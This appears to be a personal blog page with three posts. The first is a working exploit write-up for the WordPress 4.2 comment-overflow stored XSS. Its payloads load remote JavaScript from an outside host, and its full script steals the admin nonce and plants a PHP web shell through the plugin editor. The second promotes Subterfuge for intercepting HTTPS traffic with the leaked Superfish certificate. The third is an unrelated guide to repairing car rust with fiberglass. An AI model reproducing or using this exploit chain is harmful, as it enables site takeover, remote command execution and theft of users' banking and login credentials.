WordPress 4.2 Comment Field Overflow Exploit

While far from unique, the recent vulnerability in the WordPress 4.2 comment system is exceptionally egregious. The vast majority of WordPress attacks effect user installed plugins. Though these plugins often receive wide usage exploitation of associated vulnerabilities is limited to those users who individually added this content to their site. This vulnerability comes packaged with the default WordPress build.

What’s the big deal?

WordPress is the most popular blogging system in the world, and is used by over 60 million websites. The WordPress Content Management System (CMS) is so popular that it often sees usage on more then just blogs, yes even e-commerce sites. 23.3% of the top 10 million websites are WordPress, and unless these sites disabled the default comment system or installed an alternate comment plugin they are ALL vulnerable.

WordPress released an emergency patch for this vulnerability. If automatic updates are allowed the patch is pushed with 4.1.4. Alternately, upgrading WordPress to version 4.2.2 resolves this issue.

Comment Field Overflow Vulnerability

The vulnerability was discovered by Jouko Pynnonen and exploits a stored Cross Site Scripting (XSS) flaw. Effected software packages:

  • WordPress 4.2
  • WordPress 4.1.2
  • WordPress 4.1.1
  • WordPress 3.9.3

The bug itself is a result of a MySQL database limitation for very long posts. When WordPress stores the content of these uber long comments in the database MySQL truncates the result. This means that the closing tags in an HTML field like <a title are lost when the comment is loaded into the database. mysql-snip

Contents of the mysql database once the comment has been truncated and inserted

Theoretically, the truncation would break the tag rendering the XSS invalid. As a result WordPress fails browser-fix2to filter the content. In practice, however, while WordPress certainly fails to filter the dangerous content the user’s browser is much more helpful.

Because HTML is such a versatile language adherence to best practice coding syntax is not… universal. As a result browsers attempt to automatically fix coding issues like broken tags. The browser (tested in Chrome and Firefox) will add in an enclosing </a> tag as seen in the source code shot pictured.

And that gentlemen, is code execution. Now for the fun part, getting a shell!

Proof of Concept Alert

The proof of concept exploit below can be used to determine whether a site is vulnerable.

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Screen Shot 2015-05-16 at 6.54.02 PM

Executing Arbitrary Javascript

In order to fully leverage this attack we need to gain the ability to execute arbitrary JavaScript. This can be accomplished by hosting an external .js source file and using eval() embedded in an onmousover event against the target. See below:

<a title='xxx onmouseover=eval(unescape(/var%20a%3Ddocument.createElement%28%27script%27%29%3Ba.setAttribute%28%27src%27%2C%27http%3A%2f%2f10.0.0.184%2fexploit.js%27%29%3Bdocument.head.appendChild%28a%29/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Escalating To Shell Access in WordPress

Now that we have the ability to execute arbitrary remote JavaScript on the target we need to come up with a snazy way to use it! In WordPress an Administrator can use the builtin plugin editor to modify installed plugins. This effectively means: there is a page on the site that takes POST requests with PHP code!!!! Hint: The page is called plugin-editor.php

Using the xmlHTTPRequest() AJAX library we can make post and get requests with JavaScript. We first make a get request to a random page to get an admin csrftoken. The next step is to pull the token out of the HTTP response data and replay it to the plugin editor along with our payload. In this case I urlencoded my personal PHP shell (because I know the code and like it better than c99 and others). You are welcome to use it if you want, use the urldecoder here and the source below if interested. Alternately, you could just urlencode a PHP meterpreter and browse to the location whenever you are in need of a session.

Note: This attack overwrites one of the WordPress default plugins. I like to use akismet/akismet.php because it is installed be default and performs a useful function (as opposed to the hello dolly plugin, which I typically delete on my personal WordPress installs).

function get(url)
{
    var http = null;

    http = new XMLHttpRequest();
    http.open( "GET", url, false );
    http.send( null );
    return http.responseText;
}


function post(url, csrftoken)
{
    var http = null;

    http = new XMLHttpRequest();
    http.open( "POST", url, false );
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("_wpnonce=" + csrftoken + "&_wp_http_referer=/wp-admin/plugin-editor.php?file=hello.php&plugin=hello.php&newcontent=78%3C%21-----------------------------------------------------------------%0A%09%09%090sm0s1z%0A%0AThe+Purpose+of+this+file+is+to+act+as+a+Remote+File+Inclusion+vector+to+exploit+a+web+page+through+a+Persisten+Vulnerability.%0A------------------------------------------------------------------%3E%0A%0A%3Chtml%3E%0A%3Ctitle%3EH4X0R3D%3C%2Ftitle%3E%0A%3Chead%3E%0A%0A%3C%21------------------------------%0Awanna+put+some+javascript+here%3F%0A-------------------------------%3E%0A%0A%3C%2Fhead%3E%0A%0A%3Cbody%3E%0A%0A%3C%21---------------------------------------------%0APHP+Terminal%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETerminal%3A%3C%2Fh3%3E%0A%0A%0A%3Cform+method%3D%22post%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22%3E%0A0sm0s1z%3E%3Cinput+type+%3D+%22text%22+name+%3D+%22cmd%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27cmd%27%5D%29%29%0A%7B%0A%0A%0A%0Aecho+%27%3Cpre%3E%27%3B%0A%0A%24cmd+%3D+%24_POST%5B%27cmd%27%5D%3B%0A%0A%24last_line+%3D+system%28%24cmd%2C+%24retval%29%3B%0A%0A%2F%2F+Printing+additional+info%0Aecho+%27%0A%3C%2Fpre%3E%0A%3Chr+%2F%3ELast+line+of+the+output%3A+%27+.+%24last_line+.+%27%0A%3Chr+%2F%3EReturn+value%3A+%27+.+%24retval%3B%0Aecho+%27%3Chr+%2F%3E%27%3B%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%3C%21---------------------------------------------%0APHP+File+Upload+With+Directory+Selection%0A----------------------------------------------%3E%0A%0A%3Ch3%3EFile+Upload%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type%3D%22hidden%22+name%3D%22up%22+%2F%3E%0AChoose+a+file+to+upload%3A+%3Cinput+name%3D%22uploadedfile%22+type%3D%22file%22+%2F%3E%3Cbr+%2F%3E%0AFile+Path%3A%3Cinput+type+%3D+%22text%22+name+%3D+%22path%22+%2F%3E%3Cbr+%2F%3E%0A%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27path%27%5D%29%29%0A%7B%0A%0A%0A%24target_path+%3D+%22%22%3B%0A%0A%24target_path+%3D+%24_POST%5B%27path%27%5D%3B%0A%0A%24target_path+%3D+%24target_path+.+basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29%3B+%0A%0Aif%28move_uploaded_file%28%24_FILES%5B%27uploadedfile%27%5D%5B%27tmp_name%27%5D%2C+%24target_path%29%29+%7B%0A++++echo+%22The+file+%22.++basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29.+%0A++++%22+has+been+uploaded%22%3B%0A%7D+else%7B%0A++++echo+%22There+was+an+error+uploading+the+file%2C+please+try+again%21%22%3B%0A%7D%0A%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%3C%21---------------------------------------------%0AVulnerability+Test+Box%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETest+Vectors+Here%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type+%3D+%22text%22+name+%3D+%22test%22+%2F%3E%0A%3C%2Fform%3E%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27test%27%5D%29%29%0A%7B%0A%0A%24test+%3D+%24_POST%5B%27test%27%5D%3B%0A%0Aecho+%24test%3B%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%0A%0A%0A%3C%21---------------------------------------------%0AInclusion%0A----------------------------------------------%3E%0A%0A%0A%3Chr+%2F%3E%0A%3Cpre%3E%0Ainject%3A%09++%09+include%28%27mysite.php%27%29%3B+%3Cbr%3E%0ATo+exploit+Remote+File+Inclusion+Vulnerability%0A%3C%2Fpre%3E%0A%3Chr+%2F%3E%0A&action=update&file=hello.php&plugin=hello.php&scrollto=0&submit=Update+File");
    return http.responseText;

}

var page = get("/wp-admin/plugin-editor.php?file=akismet%2Fakismet.php&plugin=akismet%2Fakismet.php");

var regExp = /name=\"_wpnonce\"\svalue=\"([^)]+)\"/;
var matches = regExp.exec(page);
var csrftoken = matches[1].slice(0, 10);

post("/wp-admin/plugin-editor.php", csrftoken);

The WordPress 4.2 Comment Exploit

I wrote a Metasploit module to trigger this vulnerability:

https://github.com/0sm0s1z/WordPress-Comment-Overflow

session

The Patch

WordPress patched this flaw by disabling long comments…. Well Done….

wp-patch

Conclusion

Hopefully this post was an interesting read! If you have any thoughts on the WordPress 4.2 Comment Exploit, my Metasploit module, or a suggestion/topic you’d like covered let me know in the comments below. FYI I use Disqus, sorry :)

Further Reading:

[1] https://blog.sucuri.net/2015/04/critical-persistent-xss-0day-in-wordpress.html
[2] http://arstechnica.com/security/2015/04/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/
[3] http://thehackernews.com/2015/04/WordPress-vulnerability.html
[4] http://klikki.fi/adv/wordpress2.html
[5] https://core.trac.wordpress.org/changeset/32311/branches/4.2/src/wp-admin/includes/upgrade.php

Exploiting Superfish with Subterfuge

superfish

Let’s talk about the Internet. What do you use it for? banking, social networking, private email, registering your car, maybe even your taxes? When you’re using the web to accomplish these somewhat standard tasks you are almost invariably predicating the security of your interactions on HTTPS. Here’s funny thing about HTTPS though, it requires TRUST.

Typically, that trust is vested in a verified third-party like Comodo Inc. Now while this third party may or may not be trustworthy, at least you can be confident that all of your eggs are NOT in the same basket right? RIGHT!?

Unfortunately, if you are the recent owner of a Lenovo computer not only are all of your eggs in the frying pan, but anyone can reach over and dump them into the fire at will! How did this happen?

Using the Superfish Root CA

The integrity of HTTPS communications is seated in the certification authority trust model. In order to inject “targeted ads” into your browsing experience Lenovo had to break the foundation of that security model. Superfish, their solution to this quandary, functions by adding a root certificate authority to your computer. It then spies on your encrypted Internet traffic… not cool!

Screen Shot 2015-03-01 at 6.16.14 PM

What’s worse as an attacker you can retrieve Superfish’s certificate! That means that I can spy TOO! Robert Graham did an outstanding writeup on the steps he took to retrieve the certificate: http://blog.erratasec.com/2015/02/exploiting-superfish-certificate.html

I further removed the certificate passphrase and added it into Subterfuge in order to demonstrate just how trivial it is to exploit this vulnerability. Click the start button… wait for bank creds… really Lenovo? This kind of perversion of their customer’s trust isn’t simply bad business, it’s unethical.

Subterfuge 1.0.1

In order to facilitate attacks on Superfish we just released an exceptionally raw update to Subterfuge. In this update the toolkit moves away from SSLStrip-based proxying of web traffic to MITMProxy-based handling. So… what exactly does that mean?

1. Subterfuge can now MITM SSL sessions using arbitrary certificates

2. SSLStriping can be selectively enabled or disabled as desired

Installation

This package is an update to existing Subterfuge installations as opposed to a stand alone version.

To download the Subterfuge version 1.0 installer click here. (This version of Subterfuge does NOT include Superfish attack support).

To download the version 1.0.1 update package click here.

Version 1.0.1 now requires MITMProxy. To install MITMProxy on Kali Linux (or other debian based linux variants) run:

sudo -s
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
apt-get install build-essential python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev
pip install mitmproxy

Upgrading Subterfuge

This requires that Subterfuge version 1.0 be installed on the system already for instructions on accomplishing this see: http://kinozoa.com/blog/installing-subterfuge-on-kali-linux/

Uncompress the latest version of Subterfuge into your existing installation directory as shown below:

tar -xvf subterfuge_1.0.1.tar.gz /usr/share/

Configuring Subterfuge to SSL Intercept

Settings Page

  1. Set Proxy Mode: MITMProxy
  2. Apply

Screen Shot 2015-03-01 at 5.16.28 PM

Executing the Attack

At this point attacking with Subterfuge commences as usual. Please note that this is a bleeding edge release of the framework and has not been tested to ANY degree. That means it is likely to be buggy, or not produce expected results consistently. Please use the comments below to describe any issues you are having, and we’ll do our best to get them fixed up and packaged into a more official release… (2.0 fingers crossed).

References

MITMProxy: https://mitmproxy.org/doc/index.html

Slate: http://www.slate.com/articles/technology/bitwise/2015/02/lenovo_superfish_scandal_why_it_s_one_of_the_worst_consumer_computing_screw.html

Repairing Rust Damage with Fiberglass

My ride originally comes from Pennsylvania. As a result it has an ATROCIOUS rust problem. Fortunately, it doesn’t look like any of the rust directly impacts the structural integrity of the vehicle. After removing my hood and fenders I was able to see the full extent of the damage. I decided to fix the damage by bonding fiberglass directly to the vehicle unibody.

Tools Used:

  • Hammer
  • Flathead screwdriver
  • Metal Snips
  • Orbital Sander
  • Super cheap paintbrushes (They turn into plastic after you’re done)
  • Latex Gloves
  • Respirator

Materials:

 

20141004_150731

Liberal application of a hammer, flat head screwdriver, metal snips, and my orbital sander gave me a good look at what exactly needed repairing.

The most significant damage was under my driver’s side fender. I had to remove a fair amount of metal in order to eliminate all of the rust spots.

 

 

 

 

 

 

 

 

 

 

20141004_15075020141004_212931

Other damaged areas included the engine compartment frame that my fenders were bolted to and the floor on the drivers side. And yes I could stick my hand right through the bottom of my car and touch the road!

 

 

 

 

20141004_212955

 

There was also some corrosion damage around the battery compartment that needed patching.

 

 

Patch Management

The first step was to prep the regions. Affixing my handy dandy respirator I mixed fiberglass resin with MKP (catalyst) in order to start the clock. The resin is very sticky, but starts to harden within 3-5 minutes. I coated the problem areas liberally. By the time I’d gotten through coating all of the areas the places I started at had already gotten tacky.

Tacky – Fiberglass resin is said to have gone “tacky” once it is no longer wet and gloppy like an oil-based paint, and is holding its position. At this point the resin is very sticky (like glue). Once it has dried and is no longer sticky, it ceases to be “tacky”.

20141005_141618

Once the resin became tacky I added my first layer of 6oz fiberglass cloth. You can technically add resin to any type of cloth in order to form a solid part. The most common materials are:

Fleece/Cotton/Other Crap – Fleece or cotton are common base materials used in DIY composite construction due to their high availability and low price they lack the strength of more advanced fabrics.

Carbon Fiber – Carbon fiber is super cool, super light, super strong, and super expensive. It is also relatively hard to come by when compared to other fabrics, but it looks sick!

Kevlar – Kevlar is very strong, but it is also extremely heavy when compared to other fabrics.

Fiberglass – Fiberglass comes in two general flavors: fiberglass mat and fiberglass cloth.

Fiberglass Mat vs Cloth – The general difference is price and finish. Mat has a much more course grain and is often used in the construction of temporary parts like molds for future fiberglass work. Cloth is more expensive, but it has a denser weave and can be more easily sanded to a pristine finish. Since fiberglass is not overly expensive I chose to use it as my learning material (as opposed to expensive carbon fiber). I’m using 6oz fabric (fiberglass fabric is differentiated by the weight (oz) of the material).

The next step was to coat the fiberglass with another layer of resin in order to set it appropriately.

20141004_21294620141004_21291320141005_14173720141004_212924

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Depending on the location I laid down between 3 and 4 layers of fiberglass.

 

Sanding

20141005_153331

 

 

 

Before applying paint I sanded the patches smooth.

 

 

 

 

Finishing Touches

20141005_164215Finally, I added a layer of paint and let the sucker dry!

 

I’m really happy with how these repairs turned out. The fiberglass is extremely strong (I tested it with my hammer).

 

In making these repairs minimal weight was added to the vehicle. I didn’t have to purchase expensive welding equipment. The project only took a couple days despite my lack of experience with this type of work.

 

 

 

 

 

Let me know what you think or if I left out some obviously crucial detail that you’d like to be regaled with. Yanking the engine out was a load of fun!

20141005_184753